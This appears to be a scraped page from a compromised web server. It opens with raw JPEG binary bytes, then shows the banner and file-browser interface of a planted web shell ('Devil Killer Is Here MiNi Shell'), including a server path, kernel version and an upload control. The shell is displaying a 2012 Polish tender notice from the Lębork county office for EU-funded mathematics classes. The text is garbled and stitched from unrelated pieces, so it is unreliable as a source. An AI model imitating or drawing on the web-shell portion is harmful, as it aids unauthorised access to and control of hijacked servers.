JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120720/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120720/261982-N-2012.html

<p class="kh_header"><b>Lębork: Opracowanie autorskiego programu nauczania w ZSO nr 1 w Lęborku i przeprowadzenie cyklu zajęć pozalekcyjnych oraz wyrównawczych dla uczniów/uczennic w ramach projektu pn. Tandemem do świetlanej przyszłości współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 261982 - 2012; data zamieszczenia: 20.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Starostwo Powiatowe w Lęborku , ul. Czołgistów 5, 84-300 Lębork, woj. pomorskie, tel. 059 8632810, faks 059 8632850.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.powiat-lebork.com/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie autorskiego programu nauczania w ZSO nr 1 w Lęborku i przeprowadzenie cyklu zajęć pozalekcyjnych oraz wyrównawczych dla uczniów/uczennic w ramach projektu pn. Tandemem do świetlanej przyszłości współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia 
Przedmiotem zamówienia jest opracowanie autorskiego programu nauczania w ZSO nr 1 w Lębork 
 i przeprowadzenie cyklu zajęć pozalekcyjnych i wyrównawczych dla uczniów/uczennic. Wspieranie uczniów, którzy chcą rozwijać swoje zainteresowania w zakresie  matematyki w ramach projektu pn. Tandemem do świetlanej przyszłości. współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie  9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych).
Zamówienie zostało podzielone na 2 części. Opis szczegółowy każdej części zamówienia określono w załączniku nr 1 do SIWZ. 

Przedmiot zamówienia obejmuje: 

Część 1 - Zorganizowanie i przeprowadzenie zajęć pozalekcyjnych z matematyki w ZSO nr 1 dla klasy pierwszej
Część 2 - Zorganizowanie i przeprowadzenie zajęć wyrównawczych z matematyki w ZSO nr 1 dla klasy pierwszej - grupa 1

Szczegółowy opis przedmiotu zamówienia znajduje się w załączniku nr 1 do niniejszej specyfikacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.20.00.00-6, 80.31.00.00-0, 80.41.00.00-1, 80.50.00.00-9, 80.52.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.1. co najmniej jedną osobą zdolną do wykonania zamówienia na każdą część zamówienia, na którą składa ofertę, spełniającą warunki dla nauczyciela/nauczycielki liceum ogólnokształcącego określone w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12 marca 2009r. w sprawie szczegółowych kwalifikacji, wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009r. Nr 50 poz. 400) i dodatkowo posiadającą:
- przygotowanie pedagogiczne
- ukończone studia wyższe magisterskie lub podyplomowe uprawniające do nauczania matematyki
- w ostatnich 3 latach, co najmniej 2 lata był/była zatrudniony/zatrudniona w szkole ponadgimnazjalnej.

4.2. jedna osoba prowadząca zajęcia (wskazana przez Wykonawcę) może uczestniczyć w realizacji co najwyżej dwóch części zajęć realizowanych w ramach projektu Tandemem do świetlanej przyszłości, ze względu na realizację zajęć dla kilku grup w tym samym terminie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego warunku w tym zakresie. Spełnianie warunku na podstawie oświadczenia z art. 22 ust. 1 w związku z art. 44 ustawy Pzp.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	W celu potwierdzenia spełniania opisanych przez Zamawiającego warunków udziału w postępowaniu, Wykonawcy ubiegający się o udzielenie niniejszego zamówienia obowiązani są przedłożyć:
a)	wypełniony i podpisany formularz ofertowy z wykorzystaniem wzoru - załącznik nr 2 do SIWZ
b)	oświadczenie w trybie art. 22 ust. 1 w związku z art.44 ustawy Pzp z wykorzystaniem wzoru - załącznik nr 3 do SIWZ
c) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji, doświadczenia i wykształcenia niezbędnymi do wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi osobami - załącznik nr 5 do SIWZ.

2) W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy 
w okolicznościach, o których mowa w art.24 ust.1 ustawy należy złożyć następujące dokumenty: 
a) oświadczenie o braku podstaw do wykluczenia z powodu nie spełnienia warunków, o których mowa w art. 24 ust. 1 ustawy Pzp z wykorzystaniem wzoru - załącznik nr 4 do SIWZ
W przypadku oferty składanej przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, dokumenty potwierdzające, że Wykonawca nie podlega wykluczeniu składa każdy wykonawca oddzielnie.

3) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia obowiązani są załączyć do oferty pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia lub reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. 

4) Zamawiający wymaga wskazania w ofercie części zamówienia, których wykonanie Wykonawca zamierza powierzyć Podwykonawcom (jeżeli Wykonawca przewiduje taki udział).


5) W przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia ( z wykorzystaniem wzoru stanowiącego załącznik nr 7 do SIWZ). Jeżeli z uzasadnionej przyczyny nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który 
w wystarczający sposób potwierdza spełnianie opisanego przez Zamawiającego warunku.

Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedstawia dokumenty jak wyżej, wypełnione w języku polskim bądź z tłumaczeniem na język polski potwierdzone za zgodność z oryginałem przez wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	W przypadku zdarzeń losowych oraz szczególnych okoliczności, których nie można było przewidzieć 
w chwili zawarcia umowy, istnieje możliwość wprowadzenia zmian do zawartej umowy w zakresie:
a)	zmiany w nazwie, oznaczeniu, siedzibie, numerze konta bankowego Zamawiającego lub Wykonawcy dokonanej w trakcie trwania umowy
b)	przesunięcia terminu wykonania przedmiotu zamówienia,
c)	zmiany miejsca odbywania zajęć pozalekcyjnych
d)	zmiany osób wskazanych do przeprowadzenia zajęć pozalekcyjnych
e)	zmiany harmonogramu zajęć. 
Wszelkie zmiany postanowień niniejszej Umowy wymagają formy pisemnej pod rygorem nieważności.
Wykonawca jest zobowiązany pisemnie poinformować o zmianie, o której mowa powyżej i uzyskać zgodę Zamawiającego na jej wprowadzenie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.powiat.leborski.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2012 godzina 10:00, miejsce: Biuro Obsługi Interesanta w Starostwie Powiatowym w Lęborku, ul. Czołgistów 5, 84-300 Lębork.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty,  Poddziałanie 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie zajęć pozalekcyjnych z matematyki w ZSO nr 1 dla klasy pierwszej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie autorskiego programu nauczania w ZSO nr 1 i przeprowadzenie cyklu zajęć pozalekcyjnych i wyrównawczych dla uczniów/uczennic. Wspieranie uczniów, którzy chcą rozwijać swoje zainteresowania w zakresie matematyki w ramach projektu pn. Tandemem do świetlanej przyszłości. współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie  9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych).
Zamówienie zostało podzielone na 2 części. Opis szczegółowy każdej części zamówienia określono w załączniku nr 1 do SIWZ. Wykonawca może złożyć ofertę na dowolną liczbę części zamówienia, pod warunkiem, że jedna osoba prowadząca zajęcia (wskazana przez Wykonawcę) może uczestniczyć w realizacji co najwyżej dwóch części zajęć realizowanych w ramach projektu, ze względu na realizację zajęć dla kilku grup w tym samym terminie.

Przedmiot zamówienia musi być wykonywany przez osoby prowadzące zajęcia spełniające warunki opisane w rozdziale 8 ust.1 pkt. 4 SIWZ.
2. Cele przedmiotu zamówienia
Celem zajęć pozalekcyjnych jest rozwijanie zainteresowań uczniów oraz wzrost ich kompetencji kluczowych,  świadomości i umiejętności społeczno-kulturalnych. Realizowanie zajęć pozalekcyjnych przyczyni się do wyrównywania dysproporcji edukacyjnych oraz spowoduje zwiększenie zainteresowania przedmiotowego, a co za tym idzie, większe wyspecjalizowanie zawodowe przyszłych absolwentów.
Celem zajęć wyrównawczych jest eliminowanie trudności w nauce i uzupełnienie braków wiedzy.
3. Adresaci
Grupę docelową w projekcie stanowić będzie 865 uczniów (550K i 315M). Zgodnie z Szczegółowym Opisem Priorytetów  będą to uczniowie dwóch placówek oświatowych, prowadzących kształcenie ogólne, posiadających miejsce zamieszkania (w rozumieniu przepisów Kodeksu Cywilnego) na terenie woj. pomorskiego uczęszczających do Zespołu Szkół Ogólnokształcących w nr 1 (ZSO nr 1) i Zespołu Szkół Ogólnokształcących w nr 2 (ZSO nr 2).
W ramach przedmiotu zamówienia w każdej części do udziału w zajęciach pozalekcyjnych skierowanych zostanie po 10 uczniów/uczennic.
4.  Podział na zadania
Każda grupa liczy 10 osób.

Część 1 - Zorganizowanie i przeprowadzenie zajęć pozalekcyjnych z matematyki w ZSO nr dla klasy pierwszej

Przedmiot zamówienia obejmuje:
1.	Opracowanie autorskiego programu nauczania na podstawie zdiagnozowanych potrzeb edukacyjnych - 10 uczniów/uczennic skierowanych na zajęcia pozalekcyjne i przekazanie dokumentu do personelu projektu.
2.	Przeprowadzenie 72 godzin zajęć pozalekcyjnych w zakresie matematyki gr. I  o rozszerzonej podstawie programowej w oparciu o opracowany przez nauczyciela/ nauczycielkę autorski program nauczania - średnio po 2 godziny tygodniowo w okresie październik 2012 - czerwiec 2013r.

Zajęcia pozalekcyjne mają za zadanie  w szczególności rozwijać kompetencje kluczowe takie jak:
 - kompetencje matematyczne,
 - umiejętność uczenia się,
Formy prowadzenia zajęć pozalekcyjnych:
 - ćwiczenia
 - wykłady

5. Czas trwania zajęć pozalekcyjnych i wyrównawczych
Zajęcia będą się odbywać w 2 grupach (1 grupa zajęć pozalekcyjnych, 1 grupa zajęć wyrównawczych). Liczba osób 
w każdej grupie wynosi 10 osób. 
Łączna liczba godzin wynosi 72 godziny na każdą grupę uczestników zajęć.           
Na jedną godzinę zegarową składa się jedna godzina lekcyjna = 45 minut. 
Zajęcia pozalekcyjne/wyrównawcze należy przeprowadzić w dni robocze dla ZSO nr 1 Lęborku poza obowiązkowymi godzinami lekcyjnymi według harmonogramu w ujęciu tygodniowym ustalonym z koordynatorem merytorycznym każdej ze szkół, personelem projektu oraz musi on być przedstawiony do zatwierdzenia Zamawiającemu. Terminy i godziny zajęć pozalekcyjnych/wyrównawczych dostosowane będą do najbardziej pożądanych przez odbiorców zajęć. 
6. Wytyczne dotyczące realizacji przedmiotu zamówienia
1.	Osoba prowadząca zajęcia w ramach danej części przedmiotu zamówienia na podstawie testu sprawdzającego posiadaną wiedzę dokona diagnozy braków edukacyjnych 10 uczniów/uczennic skierowanych na zajęcia pozalekcyjne/wyrównawcze. 

2.	Osoba prowadząca zajęcia w ramach danej części przedmiotu zamówienia na podstawie przeprowadzonego testu opracuje i przekaże Zamawiającemu w terminie do 10 dni od daty rozpoczęcia zajęć autorski program nauczania, który musi zawierać następujące informacje:
a)	metryczka programu (ogólne informacje o programie - autor, adresat, geneza programu, koncepcja programu, organizacja zajęć, liczba godzin),
b)	cele ogólne i szczegółowe,
c)	plan nauczania określający nazwę obszarów tematycznych oraz ich wymiar,
d)	przewidywane osiągnięcia uczniów,
e)	literatura (podręczniki, zbiory zadań, skrypty itp.).
Dopuszczalne i wskazane jest wprowadzanie w programie nauczania przez osoby prowadzące zajęcia zmian prowadzących do uzyskania lepszego zrealizowania celów zajęć pozalekcyjnych/wyrównawczych oraz większego dostosowania ich do potrzeb uczestniczących uczniów. O zmianach takich Wykonawca obowiązany jest poinformować Zleceniodawcę w formie pisemnej lub elektronicznej.

3.	Osoba prowadząca zajęcia w ramach danej części przedmiotu zamówienia opracuje i przekaże Zamawiającemu w terminie co najmniej 5 dni przed datą pierwszych zajęć pozalekcyjnych/wyrównawczych na pierwszy miesiąc kalendarzowy zajęć oraz najpóźniej w ciągu 5 dni od rozpoczęcia każdego miesiąca na dany miesiąc zajęć pozalekcyjnych plany zajęć, zawierające co najmniej następujące elementy:
a)	temat, 
b)	cele, 
c)	czas trwania zajęć,
d)	metody i formy pracy,
e)	środki dydaktyczne,
f)	literaturę,
g)	charakterystykę materiałów, które powinien otrzymać uczeń.

4.	Osoba prowadząca zajęcia w ramach danej części przedmiotu zamówienia będzie zobowiązana do opracowania harmonogramu zajęć pozalekcyjnych/wyrównawczych w terminie do 5 dni przed rozpoczęciem pierwszych zajęć.
Harmonogram zawiera listę planowanych tematów i wymiar godzin przeznaczonych na ich realizację. 
Harmonogram należy ustalić z koordynatorem merytorycznym każdej ze szkół, personelem projektu oraz musi on być przedstawiony do zatwierdzenia Zamawiającemu. Wszelkie zmiany terminów realizacji zajęć dokonywane w harmonogramie zajęć pozalekcyjnych/wyrównawczych  powinny zostać co najmniej 5 dni przed planowaną zmianą przedstawione Zamawiającemu, a w przypadku odwołania zajęć z przyczyn niezależnych od Wykonawcy najpóźniej w dniu zaistnienia takiej okoliczności. Wszystkie zmiany dokonywane w harmonogramie wymagają pisemnej zgody Zamawiającego i nie spowodują konieczności dokonania zmian Umowy w formie aneksu.
5.	Wykonawca będzie zobowiązany do rzetelnego sporządzania i prowadzenia dokumentacji realizacji przedmiotu zamówienia, na podstawie wzorów zatwierdzonych przez Zamawiającego, a w szczególności osoby prowadzące zajęcia zobowiązane będą do prowadzenia dziennika, list obecności z realizacji zajęć pozalekcyjnych/wyrównawczych.
6.	Osoba prowadząca zajęcia w ramach danej części przedmiotu zamówienia zobowiązana jest do opracowania we własnym zakresie i wydania uczestnikom zajęć pozalekcyjnych/wyrównawczych  po ich ukończeniu, w ostatnim dniu zajęć pozalekcyjnych/wyrównawczych, odpowiednich zaświadczeń zaopatrzonych w odpowiednie logotypy oraz informację o współfinansowaniu (zgodnie z wytycznymi w zakresie informacji i promocji, które zamieszczone są na stronie internetowej: www.efs.gov.pl). 
Warunkiem otrzymania w/w dokumentu jest udział ucznia/uczennicy, w co najmniej 80% zajęciach pozalekcyjnych/wyrównawczych przewidzianych w danym działaniu. 
7.	W ramach zajęć pozalekcyjnych/wyrównawczych  należy zaplanować pracę własną uczniów, w tym np. wykonywanie dodatkowych zadań, pracę metodą projektu w grupach kilku uczniów itp. 
8.	Zamawiający wymaga, aby co najwyżej 25 % czasu każdych zajęć stanowiły wykłady/prezentacje, natomiast pozostały czas przeznaczony powinien zostać na zajęcia z wykorzystaniem metod aktywizujących ucznia.
7. Komunikacja pomiędzy Zamawiającym a Wykonawcą
1. Wykonawca będzie zobowiązany do potwierdzania w formie pisemnej lub elektronicznej dyspozycji otrzymanych od Zamawiającego, związanych z bieżącą realizacją zadań wynikających z realizacji przedmiotu zamówienia, w tym zwłaszcza dotyczących terminów i miejsc prowadzenia zajęć pozalekcyjnych/wyrównawczych.
2. Wykonawca będzie zobowiązany do przekazywania Zamawiającemu bieżącej informacji o wszelkich nieprawidłowościach w wykonaniu przedmiotu zamówienia.
3. Wykonawca będzie zobowiązany do umożliwienia Zamawiającemu prowadzenia obserwacji realizowanych zajęć pozalekcyjnych/wyrównawczych.
